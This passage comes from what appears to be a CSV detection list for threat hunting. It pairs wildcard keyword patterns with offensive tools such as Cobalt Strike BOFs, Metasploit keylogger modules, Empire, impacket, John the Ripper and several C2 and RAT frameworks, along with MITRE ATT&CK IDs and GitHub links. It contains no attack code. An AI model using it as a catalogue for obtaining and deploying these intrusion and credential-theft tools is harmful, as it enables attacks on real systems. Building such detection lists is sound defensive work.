assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*kernelcallbacktable.x64*","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*kernelcallbacktable.x64*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*kernelcallbacktable.x86*","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*kernelcallbacktable.x86*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*kernel-exploits*","offensive_tool_keyword","Github Username","github repo name hosting windows kernel exploits","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/SecWiki/windows-kernel-exploits","1","1","N/A","N/A","10","7475","2853","2021-06-11T23:29:15Z","2017-04-25T04:02:31Z" +"*KernelMii.cna*","offensive_tool_keyword","cobaltstrike","Cobalt Strike (CS) Beacon Object File (BOF) foundation for kernel exploitation using CVE-2021-21551.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tijme/kernel-mii","1","1","N/A","10","10","72","27","2023-05-07T18:38:29Z","2022-06-25T11:13:45Z" +"*KernelMii.x64.exe*","offensive_tool_keyword","cobaltstrike","Cobalt Strike (CS) Beacon Object File (BOF) foundation for kernel exploitation using CVE-2021-21551.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tijme/kernel-mii","1","1","N/A","10","10","72","27","2023-05-07T18:38:29Z","2022-06-25T11:13:45Z" +"*KernelMii.x64.o*","offensive_tool_keyword","cobaltstrike","Cobalt Strike (CS) Beacon Object File (BOF) foundation for kernel exploitation using CVE-2021-21551.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tijme/kernel-mii","1","1","N/A","10","10","72","27","2023-05-07T18:38:29Z","2022-06-25T11:13:45Z" +"*KernelMii.x86.exe*","offensive_tool_keyword","cobaltstrike","Cobalt Strike (CS) Beacon Object File (BOF) foundation for kernel exploitation using CVE-2021-21551.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tijme/kernel-mii","1","1","N/A","10","10","72","27","2023-05-07T18:38:29Z","2022-06-25T11:13:45Z" +"*KernelMii.x86.o*","offensive_tool_keyword","cobaltstrike","Cobalt Strike (CS) Beacon Object File (BOF) foundation for kernel exploitation using CVE-2021-21551.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tijme/kernel-mii","1","1","N/A","10","10","72","27","2023-05-07T18:38:29Z","2022-06-25T11:13:45Z" +"*Kevin-Robertson/Inveigh*","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","1","N/A","10","10","2212","441","2023-06-13T01:36:42Z","2015-04-02T18:04:41Z" +"*keychain2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*keylistattack.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*keylog_dump*","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","0","N/A","10","10","31","17","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z" +"*keylog_dump*","offensive_tool_keyword","DNS-Persist","DNS-Persist is a post-exploitation agent which uses DNS for command and control.","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/DNS-Persist","1","0","N/A","10","10","211","75","2017-11-20T08:53:25Z","2017-11-10T15:23:49Z" +"*keylog_inject *","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z" +"*keylog_inject.py*","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z" +"*keylog_off*","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","0","N/A","10","10","31","17","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z" +"*keylog_on*","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","0","N/A","10","10","31","17","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z" +"*keylog_recorder.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*keylog_recorder.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*keylog_start*","offensive_tool_keyword","DNS-Persist","DNS-Persist is a post-exploitation agent which uses DNS for command and control.","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/DNS-Persist","1","0","N/A","10","10","211","75","2017-11-20T08:53:25Z","2017-11-10T15:23:49Z" +"*keylog_stop*","offensive_tool_keyword","DNS-Persist","DNS-Persist is a post-exploitation agent which uses DNS for command and control.","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/DNS-Persist","1","0","N/A","10","10","211","75","2017-11-20T08:53:25Z","2017-11-10T15:23:49Z" +"*keylogger dump*","offensive_tool_keyword","SillyRAT","A Cross Platform multifunctional (Windows/Linux/Mac) RAT.","T1055.003 - T1027 - T1105 - T1005","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/hash3liZer/SillyRAT","1","0","N/A","N/A","6","594","151","2023-06-23T18:49:43Z","2020-05-10T17:37:37Z" +"*keylogger is already off*","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z" +"*keylogger stopped*","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z" +"*Keylogger*","offensive_tool_keyword","keylogger keyword","keylogger keyword. could be related to keylooger tools ","T1056.001 ","TA0006","N/A","N/A","POST Exploitation tools","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*Keylogger.cs*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*Keylogger.exe*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","820","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" +"*Keylogger.pdb*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","820","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" +"*Keylogger.ps1*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*keylogger.py*","offensive_tool_keyword","disctopia-c2","Windows Remote Administration Tool that uses Discord Telegram and GitHub as C2s","T1105 - T1043 - T1102","TA0003 - TA0008 - TA0002","N/A","N/A","C2","https://github.com/3ct0s/disctopia-c2","1","1","N/A","10","10","321","89","2023-09-26T12:00:16Z","2022-01-02T22:03:10Z" +"*keylogrecorder.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*keylooger.ps1*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*keyring2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*keyscan dump*","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","451","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" +"*keyscan start*","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","451","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" +"*keyscan stop*","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","451","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" +"*keystore2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*KeyTabExtract*","offensive_tool_keyword","KeyTabExtract","KeyTabExtract is a little utility to help extract valuable information from 502 type .keytab files. which may be used to authenticate Linux boxes to Kerberos. The script will extract information such as the realm. Service Principal. Encryption Type and NTLM Hash","T1003 - T1552.004 - T1110 - T1210","TA0006 - TA0002 - TA0001","N/A","N/A","Information Gathering","https://github.com/sosdave/KeyTabExtract","1","0","N/A","N/A","2","145","36","2020-08-26T01:03:37Z","2019-03-18T15:00:14Z" +"*keyword_obfuscation*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*kgretzky*","offensive_tool_keyword","Github Username","username Kuba Gretzky hosting sniffing and spoofing exploitation tools","N/A","N/A","N/A","N/A","Sniffing & Spoofing","https://github.com/kgretzky","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*kgretzky/evilqr*","offensive_tool_keyword","evilqr","Proof-of-concept to demonstrate dynamic QR swap phishing attacks in practice","T1566.002 - T1204.001 - T1192","TA0001 - TA0005","N/A","N/A","Phishing","https://github.com/kgretzky/evilqr","1","1","N/A","N/A","2","152","21","2023-07-05T13:24:44Z","2023-06-20T12:58:09Z" +"*kgretzky/pwndrop*","offensive_tool_keyword","pwndrop","Self-deployable file hosting service for red teamers allowing to easily upload and share payloads over HTTP and WebDAV.","T1105 - T1071 - T1071.001 - T1090 - T1027 - T1027.005","TA0011 - TA0005 - TA0042","N/A","N/A","C2","https://github.com/kgretzky/pwndrop","1","1","N/A","10","10","1751","236","2023-02-25T05:08:15Z","2019-11-28T19:06:30Z" +"*kh4sh3i/Spring-CVE*","offensive_tool_keyword","POC","POC exploit for CVE-2022-22963","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tools","https://github.com/kh4sh3i/Spring-CVE","1","1","N/A","N/A","1","13","7","2022-03-31T20:58:54Z","2022-03-31T20:19:51Z" +"*khast3x*","offensive_tool_keyword","Github Username","Red team exploitation tools ","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/khast3x","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*khast3x/h8mail*","offensive_tool_keyword","h8mail","Powerful and user-friendly password hunting tool.","T1581.002 - T1591 - T1590 - T1596 - T1592 - T1217.001","TA0010","N/A","N/A","Information Gathering","https://github.com/opencubicles/h8mail","1","1","N/A","N/A","1","9","5","2019-08-19T09:46:33Z","2019-08-19T09:45:32Z" +"*Kicking off download cradle in a new process*","offensive_tool_keyword","empire","empire script command. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by 